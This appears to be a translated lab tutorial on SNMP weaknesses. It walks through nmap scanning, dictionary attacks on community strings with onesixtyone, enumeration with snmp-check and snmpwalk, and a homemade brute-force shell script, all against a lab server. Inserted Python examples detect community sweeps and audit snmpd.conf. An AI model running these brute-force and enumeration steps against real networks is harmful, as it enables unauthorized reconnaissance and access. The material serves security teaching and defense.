
SNMP Sniffing Attack: onesixtyone (brute-force attack)

 



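SNMP Vulnerabilities


Attack Techniques Exploiting SNMP Vulnerabilities and Countermeasures [gusxodnjs].pdf

(Countermeasures for SNMP Vulnerabilities - Hyun Tae-won, Dongseo University)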



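SNMP (Simple Network Management Protocol) makes managing a network more convenient.

For all that convenience, however, it does not fare well from a security point of view.

SNMP is a protocol created for network management tasks such as centralized management. With simple commands it can collect data such as CPU information and interface traffic from remote systems for monitoring.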


Vulnerability: traffic, including the community string, is sent in plaintext.


SNMP-related ports

7/udp, 161/tcp, 161/udp, 162/tcp, 162/udp, 199/tcp, 391/tcp, 391/udp, 705/tcp, 1993/tcp, 1993/udp


Current use of NMS: resource monitoring


 

 

Let's learn about SNMP vulnerabilities.

 

 

 

[Reference] URLs on SNMP vulnerabilities

 

http://myungin.tistory.com/entry/11-NMSSNMPTFTP-SNMP-%EA%B3%B5%EA%B2%A9-%EA%B8%B0%EB%B2%95

http://semidntmd.tistory.com/entry/%ED%8F%AC%ED%8A%B8%EC%8A%A4%EC%BA%90%EB%8B%9D%EA%B3%BC-SNMP-%ED%94%84%EB%A1%9C%ED%86%A0%EC%BD%9C-%EC%B7%A8%EC%95%BD%EC%A0%90

 

 

SNMP RFC documents (http://www.ietf.org/rfc/rfcNNNN.txt)

- RFC 2578 ~ 2580

 

 

Systems used

- linux200 (SNMP Server)

- kaliLinux (SNMP Client)

 

 

Tools used

- snmpcheck (information check)

- onesixtyone (brute-force attack)

 

 

        (if Windows) When using a Windows SNMP server

        c:\> netstat -a | findstr 161

           Run > services.msc > confirm that the SNMP service is running

 

        (if Linux) When using a Linux SNMP server

        # rpm -qa | grep snmp

        # yum -y install net-snmp net-snmp-libs net-snmp-utils

         

        # chkconfig --list | grep snmp (#chkconfig --list snmpd)

        # chkconfig snmpd on

        # service snmpd restart

        # chkconfig snmptrapd on

        # service snmptrapd restart

 

 

(KaliLinux)

 

Service port scanning

# nmap -sU -p 161 192.168.20.200          (snmp daemon port 161 / -sU: UDP scan)

Starting Nmap 6.46 ( http://nmap.org ) at 2015-04-17 13:44 KST

Nmap scan report for 192.168.20.200

Host is up (0.00066s latency).

PORT STATE SERVICE

161/udp open snmp

MAC Address: 00:0C:29:E0:2C:6F (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds

-> If port 161 is closed, perform the following steps.

(Linux)

    # yum -y install net-snmp net-snmp-libs net-snmp-utils

    # chkconfig --list | grep snmp

    # chkconfig snmpd on

    # chkconfig snmptrapd on

    # service snmpd restart

    # service snmptrapd restart



Dictionary attack (using the onesixtyone tool): run a dictionary attack against linux200 (tool: onesixtyone)

# wireshark &

# onesixtyone

-----------------------------------------------------

onesixtyone 0.3.2 [options] <host> <community>

-c <communityfile> file with community names to try

-i <inputfile> file with target hosts

-o <outputfile> output log

-d debug mode, use twice for more information

 

-w n wait n milliseconds (1/1000 of a second) between sending packets (default 10)

-q quiet mode, do not print log to stdout, use with -l

examples: ./s -c dict.txt 192.168.4.1 public

./s -c dict.txt -i hosts -o my.log -w 100

-----------------------------------------------------

 

# cd /usr/share/doc/onesixtyone

# ls ; cat dict.txt

README changelog.Debian.gz changelog.gz copyright dict.txt

 

# egrep '(public|private)' dict.txt

private

public

 

# onesixtyone -c dict.txt 192.168.20.200          (SNMP sniffing against linux200)

Scanning 1 hosts, 49 communities

192.168.20.200 [public] Linux linux200.example.com 2.6.18-348.el5 #1 SMP Tue Jan 8 17:57:28 EST 2013 i686

-> Analyze the process with Wireshark.

-> This shows that public is being used as the community string.

 

        [Reference] Ways to obtain the community string

        - Default community string (public, private)

        - Sniffing (the community string is transmitted in plaintext)

        - Dict/BruteForce Attack
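
The plaintext community string and the dictionary sweep described above, seen from the monitoring side, as an added example that is not part of the original post: it reads the community straight out of SNMPv1/v2c payloads and flags default strings and a single source trying many strings. The packets, the addresses 192.168.20.50 and 192.168.20.10, the word list and the thresholds are constructed for the example.

```python
from collections import defaultdict

DEFAULTS = {"public", "private"}          # default strings named on this page
# Constructed GetRequest PDU for sysDescr.0 (request-id 1), reused by every sample packet
PDU = bytes.fromhex("a019020101020100020100300e300c06082b060102010101000500")

def read_tlv(buf, pos):
    """Return (tag, value, next_pos) for the BER TLV that starts at pos."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                     # long form: low 7 bits count the length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length

def community_of(payload):
    """Community string of an SNMPv1/v2c UDP payload, or None if it is not one."""
    try:
        tag, msg, _ = read_tlv(payload, 0)            # outer SEQUENCE
        vtag, ver, pos = read_tlv(msg, 0)             # INTEGER version (0 = v1, 1 = v2c)
        ctag, comm, _ = read_tlv(msg, pos)            # OCTET STRING community, unencrypted
    except (IndexError, ValueError):
        return None
    if (tag, vtag, ctag) != (0x30, 0x02, 0x04) or ver not in (b"\x00", b"\x01"):
        return None
    return comm.decode("latin-1")

def detect(packets, window=5.0, threshold=5):
    """packets: (timestamp, src_ip, udp_payload) tuples. Returns a list of alert tuples."""
    recent, swept, alerts = defaultdict(list), set(), []
    for ts, src, payload in sorted(packets, key=lambda p: p[0]):
        comm = community_of(payload)
        if comm is None:
            continue
        if comm in DEFAULTS and ("default-community", src, comm) not in alerts:
            alerts.append(("default-community", src, comm))
        recent[src] = [(t, c) for t, c in recent[src] if ts - t <= window] + [(ts, comm)]
        distinct = {c for _, c in recent[src]}
        if len(distinct) >= threshold and src not in swept:   # many strings, one source
            swept.add(src)
            alerts.append(("community-sweep", src, len(distinct)))
    return alerts

def sample_get(community, version=1):
    """Build a constructed SNMP GetRequest (short-form lengths only)."""
    body = bytes([0x02, 0x01, version, 0x04, len(community)]) + community.encode() + PDU
    return bytes([0x30, len(body)]) + body

def demo():
    words = ["admin", "cisco", "private", "monitor", "public", "secret"]   # constructed
    pkts = [(100 + i * 0.01, "192.168.20.50", sample_get(w)) for i, w in enumerate(words)]
    pkts += [(t, "192.168.20.10", sample_get("n0c-Mon1tor")) for t in (90, 150, 210)]
    pkts.append((120, "192.168.20.10", b"\x00garbage"))     # non-SNMP noise is skipped
    return detect(pkts)

if __name__ == "__main__":
    for alert in demo():
        print(alert)
```
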

 

Checking key system information (snmpenum)

 

        KaliLinux 1.x) snmpcheck CMD

        KaliLinux 2.x) snmp-check CMD

 

# snmp-check -t 192.168.20.200 -c public -p 161

snmpcheck v1.8 - SNMP enumerator

Copyright (c) 2005-2011 by Matteo Cantoni (www.nothink.org)

 

[*] Try to connect to 192.168.20.200

[*] Connected to 192.168.20.200

[*] Starting enumeration at 2015-04-17 13:53:29

 

[*] System information

------------------------------------------------------------------------------------

 

Hostname : linux200.example.com

Description : Linux linux200.example.com 2.6.18-348.el5 #1 SMP Tue Jan 8 17:57:28 EST 2013 i686

Uptime system : 2 hours, 28:36.43

Uptime SNMP daemon : 9 minutes, 58.91

Contact : Root <root@localhost> (configure /etc/snmp/snmp.local.conf)

Location : Unknown (edit /etc/snmp/snmpd.conf)

Motd : -

 

[*] Network information

------------------------------------------------------------------------------------

 

IP forwarding enabled : -

Default TTL : -

TCP segments received : -

TCP segments sent : -

TCP segments retrans. : -

Input datagrams : -

Delivered datagrams : -

Output datagrams : -

 

[*] Enumerated 192.168.20.200 in 0.12 seconds

Signal USR1 received in thread 1, but no signal handler set. at /usr/bin/snmpcheck line 230.

 

 

Let's learn the SNMP-related commands.

 

(linux200)

 

           ■ How to use the snmp commands

    (snmpget = snmpwalk)

        # snmpwalk -v1 -c public localhost .1     

        # snmpwalk -v1 -c public localhost system

        # snmptranslate -Tl          (print the output as a list)

        # snmptranslate -Tp          (print the output as a tree)

   Prints the OID values

 

        # snmptranslate -Tl > /test/mibtree.txt          (save the list-form output to a file)

        # cat /test/mibtree.txt | egrep '(Swap|mem)' 

 

        # snmpwalk -v1 -c public localhost .1.3.6.1.4.1.2021.4.4

        # snmpwalk -v1 -c public localhost .1.3.6.1.4.1.2021.4.6

 

# snmpwalk -v1 -c public localhost .1

iso.3.6.1.2.1.1.1.0 = STRING: "Linux linux249.example.com 2.6.18-348.el5 #1 SMP Tue Jan 8 17:57:28 EST 2013 i686"

iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10

iso.3.6.1.2.1.1.3.0 = Timeticks: (154881) 0:25:48.81

iso.3.6.1.2.1.1.4.0 = STRING: "Root <root@localhost> (configure /etc/snmp/snmp.local.conf)"

iso.3.6.1.2.1.1.5.0 = STRING: "linux249.example.com"

iso.3.6.1.2.1.1.6.0 = STRING: "Unknown (edit /etc/snmp/snmpd.conf)"

iso.3.6.1.2.1.1.8.0 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.1

iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.2.1.49

iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.2.1.4

iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.2.1.50

iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1

iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.6.3.10.3.1.1

iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.6.3.11.3.1.1

iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.6.3.15.2.1.1

iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB module for SNMPv2 entities"

iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB module for managing TCP implementations"

iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The MIB module for managing IP and ICMP implementations"

iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for managing UDP implementations"

iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."

iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The SNMP Management Architecture MIB."

iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB for Message Processing and Dispatching."

iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The management information definitions for the SNMP User-based Security Model."

iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (2) 0:00:00.02

iso.3.6.1.2.1.25.1.1.0 = Timeticks: (1667931) 4:37:59.31

End of MIB

 

# snmptranslate -Tl

..... (omitted) .....

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBCompliances(1)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBCompliances(1).snmpCommunityMIBCompliance(1)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBCompliances(1).snmpProxyTrapForwardCompliance(2)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBGroups(2)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBGroups(2).snmpCommunityGroup(1)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpCommunityMIB(18).snmpCommunityMIBConformance(2).snmpCommunityMIBGroups(2).snmpProxyTrapForwardGroup(3)

.iso(1).org(3).dod(6).internet(1).snmpV2(6).snmpModules(3).snmpv2tm(19)

.ccitt(0).zeroDotZero(0)

 

# snmptranslate -Tp

+--iso(1)

|

+--org(3)

|

+--dod(6)

|

+--internet(1)

|

+--directory(1)

|

+--mgmt(2)

| |

| +--mib-2(1)

| |

| +--system(1)

| | |

| | +-- -R-- String sysDescr(1)

| | | Textual Convention: DisplayString

| | | Size: 0..255

| | +-- -R-- ObjID sysObjectID(2)

| | +-- -R-- TimeTicks sysUpTime(3)

| | | |

| | | +--sysUpTimeInstance(0)

| | |

..... (omitted) .....

 

# mkdir -p /test && cd /test

# snmptranslate -Tl > /test/mibtree.txt

# cat /test/mibtree.txt | egrep '(Swap|mem)'

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memIndex(1)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memErrorName(2)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalSwap(3)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailSwap(4)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalReal(5)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailReal(6)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalSwapTXT(7)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailSwapTXT(8)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalRealTXT(9)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailRealTXT(10)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalFree(11)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memMinimumSwap(12)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memShared(13)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memBuffer(14)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memCached(15)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memSwapError(100)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memSwapErrorMsg(101)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssSwapIn(3)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssSwapOut(4)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssRawSwapIn(62)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssRawSwapOut(63)


 


 


(Simple test)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalReal(5)


 

# snmpwalk -v 1 -c public localhost .1.3.6.1.4.1.2021.4.5

(Normal output)

UCD-SNMP-MIB::memTotalReal.0 = INTEGER: 1034504

 

(Abnormal output)

End of MIB

 

 

(linux200) Configure snmpd so that the information is displayed

 

# cd /etc/snmp

# ls

snmpd.conf

 

# cp -p snmpd.conf snmpd.conf.orig

# vi snmpd.conf

:set nu

:38,62s/^/#-->/ (:38,62s/^#-->//)


Uncomment lines 110~151

 

110 # First, map the community name "public" into a "security name"

111 # sec.name source community

112 com2sec notConfigUser default public

113

114 # Second, map the security name into a group name:

115 # groupName securityModel securityName

116 group notConfigGroup v1 notConfigUser

117 group notConfigGroup v2c notConfigUser

118

119 # Third, create a view for us to let the group have rights to:

120 # Open up the whole tree for ro, make the RFC 1213 required ones rw.

121 # name incl/excl subtree mask(optional)

122 view roview included .1

123 view rwview included system.sysContact

124 view rwview included system.sysName

125 view rwview included system.sysLocation

126 view rwview included interfaces.ifTable.ifEntry.ifAdminStatus

127 view rwview included at.atTable.atEntry.atPhysAddress

128 view rwview included at.atTable.atEntry.atNetAddress

129 view rwview included ip.ipForwarding

130 view rwview included ip.ipDefaultTTL

131 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteDest

132 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteIfIndex

133 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric1

134 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric2

135 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric3

136 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric4

137 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteType

138 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteAge

139 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMask

140 view rwview included ip.ipRouteTable.ipRouteEntry.ipRouteMetric5

141 view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaIfIndex

142 view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress

143 view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaNetAddress

144 view rwview included ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaType

145 view rwview included tcp.tcpConnTable.tcpConnEntry.tcpConnState

146 view rwview included egp.egpNeighTable.egpNeighEntry.egpNeighEventTrigger

147 view rwview included snmp.snmpEnableAuthenTraps

148

149 # Finally, grant the group read-only access to the systemview view.

150 # group context sec.model sec.level prefix read write notif

151 access notConfigGroup "" any noauth exact roview rwview none

..... (omitted) .....

 

# service snmpd restart

Stopping snmpd: [ OK ]

Starting snmpd: [ OK ]
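
An added example (not from the original post and not part of net-snmp): a small Python audit of the com2sec/view/access lines enabled above, run against that configuration and against a tightened variant that uses the same directives. The management address 192.168.20.10, the replacement community string and the names nmsUser, nmsGroup and sysview are constructed values.

```python
import shlex

DEFAULTS = {"public", "private"}            # default community strings named on this page
WHOLE_TREE = {".1", "1", ".iso", "iso"}     # subtrees that cover the entire MIB

# Directives as enabled on linux200 above (rwview list shortened)
WEAK = """\
com2sec notConfigUser  default  public
group   notConfigGroup v1   notConfigUser
group   notConfigGroup v2c  notConfigUser
view    roview  included  .1
view    rwview  included  system.sysContact
access  notConfigGroup ""  any  noauth  exact  roview rwview none
"""

# Tightened variant (constructed): one management host, non-default string,
# read view limited to system and UCD memory, no write view.
# With v1/v2c the string itself still crosses the network in plaintext.
HARDENED = """\
com2sec nmsUser   192.168.20.10  Xq7-constructed-string
group   nmsGroup  v2c  nmsUser
view    sysview   included  .1.3.6.1.2.1.1
view    sysview   included  .1.3.6.1.4.1.2021.4
access  nmsGroup  ""  any  noauth  exact  sysview none none
"""

def audit(conf_text):
    """Return findings for an snmpd.conf that uses com2sec/group/view/access."""
    rows = [shlex.split(line.split("#", 1)[0]) for line in conf_text.splitlines()]
    rows = [r for r in rows if r]
    wide_views = {r[1] for r in rows if r[0] == "view" and len(r) >= 4
                  and r[2] == "included" and r[3] in WHOLE_TREE}
    findings = []
    for r in rows:
        if r[0] == "com2sec" and len(r) >= 4:
            name, source, community = r[1:4]
            if source == "default":
                findings.append(f"com2sec {name}: accepts requests from any source address")
            if community in DEFAULTS:
                findings.append(f"com2sec {name}: default community string '{community}'")
        elif r[0] == "access" and len(r) >= 9:
            # access GROUP CONTEXT MODEL LEVEL PREFIX READ WRITE NOTIFY
            group, level, read, write = r[1], r[4], r[6], r[7]
            if read in wide_views:
                findings.append(f"access {group}: read view '{read}' exposes the whole MIB tree")
            if write != "none" and level == "noauth":
                findings.append(f"access {group}: write view '{write}' granted at noauth level")
    return findings

if __name__ == "__main__":
    for label, conf in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(conf))
```
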

 

# cat /test/mibtree.txt | egrep '(Swap|memory)'

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memIndex(1)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memErrorName(2)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalSwap(3)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailSwap(4)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalReal(5)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailReal(6)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalSwapTXT(7)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailSwapTXT(8)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalRealTXT(9)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailRealTXT(10)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalFree(11)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memMinimumSwap(12)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memShared(13)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memBuffer(14)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memCached(15)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memSwapError(100)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memSwapErrorMsg(101)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssSwapIn(3)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssSwapOut(4)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssRawSwapIn(62)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).systemStats(11).ssRawSwapOut(63)

 

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memTotalReal(5)

.iso(1).org(3).dod(6).internet(1).private(4).enterprises(1).ucdavis(2021).memory(4).memAvailReal(6)

 

# snmpwalk -v1 -c public localhost .1.3.6.1.4.1.2021.4.5        (capacity in use)

UCD-SNMP-MIB::memTotalReal.0 = INTEGER: 1034504

 

# snmpwalk -v1 -c public localhost .1.3.6.1.4.1.2021.4.6        (remaining capacity)

UCD-SNMP-MIB::memAvailReal.0 = INTEGER: 598588

 

# free

                 total         used         free     shared    buffers     cached

Mem:      1571444    1039612     531832           0      60992     827716

-/+ buffers/cache:       150904    1420540

Swap:      2097144             0    2097144






    (Kali Linux)

    # snmpwalk -v2c -c public 192.168.20.200 .1

    # snmp-check -t 192.168.20.200 -c public

 

# cat /test/mibtree.txt | egrep ipForwarding

.iso(1).org(3).dod(6).internet(1).mgmt(2).mib-2(1).ip(4).ipForwarding(1)

.iso(1).org(3).dod(6).internet(1).mgmt(2).mib-2(1).ip(4).ipv6IpForwarding(25)

 

# snmpwalk -v2c -c public localhost .1.3.6.1.2.1.4.1

IP-MIB::ipForwarding.0 = INTEGER: notForwarding(2)

 

 

---------------------------------------------------------------------

 

        # snmpset [COMMON OPTIONS] OID TYPE VALUE [OID TYPE VALUE]...

 

# snmpwalk -v2c -c public localhost .1.3.6.1.2.1.1.4

SNMPv2-MIB::sysContact.0 = STRING: Root <root@localhost> (configure /etc/snmp/snmp.local.conf)

 

# snmpset -v2c -c public localhost .1.3.6.1.2.1.1.4 s "test string"

------------------------------------------

Error in packet.

Reason: notWritable (That object does not support modification)

Failed object: SNMPv2-MIB::sysContact

------------------------------------------

 

.iso(1).org(3).dod(6).internet(1).mgmt(2).mib-2(1).system(1).sysName(5)

# snmpwalk -v2c -c public localhost .1.3.6.1.2.1.1.5

SNMPv2-MIB::sysName.0 = STRING: linux249.example.com

 

# snmpset -v2c -c public localhost .1.3.6.1.2.1.1.5 s test.example.com

Error in packet.

Reason: notWritable (That object does not support modification)

Failed object: SNMPv2-MIB::sysName

 

-> Check which entries are writable

 

 



 

[Lab] Additional exercise

 

Let's build a tool that identifies the SNMP server's community name (community string) through a dictionary attack.

 

    (linux200)

    # snmpwalk -v2c -c public localhost .1.3.6.1.2.1.4.1

    IP-MIB::ipForwarding.0 = INTEGER: notForwarding(2)

    # echo $?

    0

    # snmpwalk -v2c -c private localhost .1.3.6.1.2.1.4.1

    Timeout: No Response from localhost

    # echo $?

    1

 

(KaliLinux)

# cd /root/bin

# vi dict.txt

--------------------------------

private

.....

public

--------------------------------

 

# vi onesixtyone.sh

--------------------------------

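        Write the program.


TARGET_IP=192.168.20.200


# Try each community string in dict.txt against the lab server
cat dict.txt | while read COMM

do

    # snmpwalk exits 0 only when the community string is accepted
    snmpwalk -v2c -c "$COMM" "$TARGET_IP" .1.3.6.1.2.1.4.1 > /dev/null 2>&1

    [ $? -eq 0 ] && echo "$TARGET_IP's communication name : $COMM"

done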

--------------------------------

 

# ./onesixtyone.sh 192.168.20.200 dict.txt

-------------------------------------------------------

192.168.20.200's communication name : public

-------------------------------------------------------

 

 

[Reference] After running the onesixtyone and onesixtyone.sh programs, compare the packet captures in Wireshark.
